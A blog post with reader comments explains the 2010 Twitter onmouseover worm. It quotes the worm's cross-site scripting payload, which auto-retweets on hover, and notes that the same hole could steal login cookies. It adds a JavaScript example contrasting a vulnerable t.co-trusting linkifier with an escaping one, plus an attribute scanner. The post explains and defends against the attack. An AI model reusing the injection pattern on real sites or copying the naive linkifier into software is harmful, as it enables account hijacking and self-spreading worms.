Another Day, Another Twitter Exploit
Apologies to anyone out there who’s not a Twitter fan (e.g. our very own Carps springs to mind), but this is another Twitter exploit post. If you do use Twitter you’ll likely already have seen this one in action today, and if you don’t, you won’t be interested. Oh well.
The Problem
The actual exploit as I first saw it is quite simple. All it’s based on is sending out a tweet starting with http://t.co/@ and continuing with whatever HTML you want to inject into the page. t.co is Twitter’s homegrown URL shortener, and I would guess that something in their escaping logic is trusting it more than it should. Certainly the http://a.bc/@ I tried didn’t work.
The Worm
Somebody – perhaps not the person who originally discovered the issue – used it to inject a bit of code into their Twitter feed:
<a href="http://t.co/@"onmouseover="document.getElementById('status').value='RT jamslater';$('.status-update-form').submit();"class="modal-overlay"/" rel="nofollow" target="_blank">http://t.co/@"onmouseover="document.getElementById('status').value='RT jamslater';$('.status-update-form').submit();"class="modal-overlay"/</a>
Name changed to protect the guilty.
Neat. In a nutshell, if you hover your mouse cursor over the t.co link (the “onmouseover” handler) the JavaScript code is executed. All it does in this case is fill in your status at the top of the screen (the “What’s happening?” box) with “RT jamslater” and virtually click the Tweet button for you. No, I didn’t know you could retweet someone by doing that, either.
That’s how it’s spreading so fast and how every other tweet you see at the moment probably mentions it. By hovering over an affected tweet you’ll likely have retweeted it to your followers, perpetuating the cycle. This is fairly similar to the Samy worm that hit MySpace (remember them?) a few years ago.
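To show why the quote in the “URL” matters, here is an added example (not Twitter’s code, and a guess at their bug rather than a description of it): a toy auto-linker that trusts t.co links verbatim, beside a hardened one that encodes every URL for the attribute and text contexts it writes into, plus a small attribute scanner that checks which attributes a browser would see on the resulting tag.

```javascript
// Added example (hypothetical, not Twitter's code). The "naive" linkifier models
// the post's guess that t.co URLs were trusted; the "safe" one escapes everything.
const URL_RE = /https?:\/\/\S+/g;

// Encode the characters that can break out of an HTML text node or a
// double-quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function anchor(urlHtml) {
  return `<a href="${urlHtml}" rel="nofollow" target="_blank">${urlHtml}</a>`;
}

// Vulnerable: t.co links are spliced in verbatim, so a quote in the "URL"
// closes the href attribute and whatever follows becomes new attributes.
function linkifyNaive(tweet) {
  return tweet.replace(URL_RE, (url) =>
    anchor(url.startsWith("http://t.co/") ? url : escapeHtml(url)));
}

// Hardened: every URL is encoded, whatever its host, so the payload stays
// inert data inside the href value.
function linkifySafe(tweet) {
  return tweet.replace(URL_RE, (url) => anchor(escapeHtml(url)));
}

// Attribute names of the first start tag in `html`, read roughly the way a
// browser tokenizer reads them: a name ends at '=' or whitespace, and a
// double-quoted value runs to its closing quote. Used as a check that no
// event-handler attribute appeared where only href/rel/target belong.
function attributeNames(html) {
  const open = html.indexOf("<");
  const tag = html.slice(open + 1, html.indexOf(">", open));
  const names = [];
  let i = 0;
  while (i < tag.length && !/\s/.test(tag[i])) i++; // skip the tag name
  while (i < tag.length) {
    while (i < tag.length && /\s/.test(tag[i])) i++;
    let name = "";
    while (i < tag.length && tag[i] !== "=" && !/\s/.test(tag[i])) name += tag[i++];
    if (name) names.push(name.toLowerCase());
    if (tag[i] === "=") {
      i++;
      if (tag[i] === '"') { const q = tag.indexOf('"', i + 1); i = q < 0 ? tag.length : q + 1; }
      else while (i < tag.length && !/\s/.test(tag[i])) i++;
    }
  }
  return names;
}

// The worm's tweet text from the post, re-typed with straight quotes.
const WORM_TWEET = "http://t.co/@\"onmouseover=\"document.getElementById('status').value='RT jamslater';$('.status-update-form').submit();\"class=\"modal-overlay\"/";
```

With the naive linkifier the scanner reports an onmouseover attribute on the anchor; with the hardened one it sees only href, rel and target, and the same payload on a non-t.co host is escaped either way, matching the post’s observation that http://a.bc/@ did not work.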
It Could Be Worse
The code I found and examined above is fairly innocuous, if annoying. However, it isn’t limited to just sending retweets; it can essentially do anything that the Twitter website can. Send DMs, follow or unfollow people, send your login cookie off to somewhere nefarious, etc. It probably can’t change your password (you have to confirm your old one for that, thankfully) but my advice for the moment is definitely to sign out of twitter.com if you’re already on it. If not, leave and don’t come back until this issue is fixed.
External Twitter clients should be fine, unless they happen to suffer from the exact same bug. I’ve not heard of any issues outside of twitter.com.
tl;dr – Stay off the Twitter website for today. You’ve probably got work to do anyway.
Quick update: Twitter have patched it. They are “rolling out an update” at the moment.
Final update: The exploit has been patched. Panic over. Amusingly, an open source repository of Twitter-related code, controlled by a Twitter employee, has a fix in it for this exact issue dated August 23rd. Very odd that the same fix wasn’t committed to their website, especially given the public nature of the above code. It seems that they might very well have brought this on themselves.
11 Comments
mark rushworth - http://www.markrushworth.com
It’s an interesting exploit. John here at Blueclaw spent many a happy minute taking it apart and making it do strange things (before having his account blocked)… you live and learn
Olly - http://www.dijitulseo.co.uk
It spun me out at first..
I initially thought a twitter client had broken and everyone using its tweets were screwed up..
Then realised it was doing stuff!
It’s VERY simple… But it’s VERY clever!!
Not affecting tweetdeck PC and android, echofon or any of the other top clients – just the website!
#twitterfail
erica
there is something similar on facebook at the moment, you see a friend of yours has become a fan of X page, so you click on that and you land on the very website (which would be earnmoneywhatever.com) and you also automatically “Like” that page…no need to say there is no “Unlike” button.
You have to go to your Info page, then you have to go to “Edit Like” (or something like that) and click on “Remove”.
It took me about 10 minutes to figure it out and I was quite annoyed!!!
Twitter Hacked – Google Next? | Driven Media Group - pingback
[…] Twitter site was hacked yet all 3rd party apps were protected due to the API. How did it happen? Over at David Naylor they break down just how twitter…well, […]
Sean Hardaker - http://www.seanhardaker.co.uk/
one has to be very careful when operating their work/business account with all these various exploits. It may not be your fault when your account starts linking off to pills, porn or gambling sites but try telling your not so savvy ‘middle class’ followers.
these exploits are a PR nightmare and sites like Twitter need to get their act together. They’ve got a responsibility to create a safe environment for the public and business on their site.
Imagine if when I went shopping the shopping centre just let pickpockets and thieves roam free. Would we still shop there?
TallTroll
Of course the main problem is that Twitter (like most other social media properties) isn’t very social. Or it is, but in the sense that the common room of your average psych institute is social, lots of lobotomies shouting at each other, and thinking that counts as “interaction”. This is just the equivalent of one of the inmates learning how to fake taking their meds. Wait until one of them learns how to tunnel out, you know what I’m saying.
chuck - http://www.cranialborborygmus.com
Ah ha,
My last-century-luddite-inspired inclination (or excuse) to put off joining Twitter has been vindicated! I knew it was too dangerous! Now I can put off Twitter for at least another year!
Chuck, the luddite
Christopher West - http://www.seobychristopherwest.com
wow
another one… will they ever end.
my Twitter account @westcp (I think) was blocked
my second one @SEO_Wizzards also seems to be blocked (says pw is incorrect and I cannot recover it) but yet I can access it via Tweetdeck
Dan - http://www.keywordshack.com
I’m just wondering whether we’re going to have to deal with similar exploits when the new Twitter kicks in :\
Roger Bert
There are always teething problems with new releases. Need to be on guard all the time now.
sven @ büroaufzeit - http://bueroaufzeit.net
In my opinion this is happening way too much in the last time. I’m not sure if I should still trust twitter…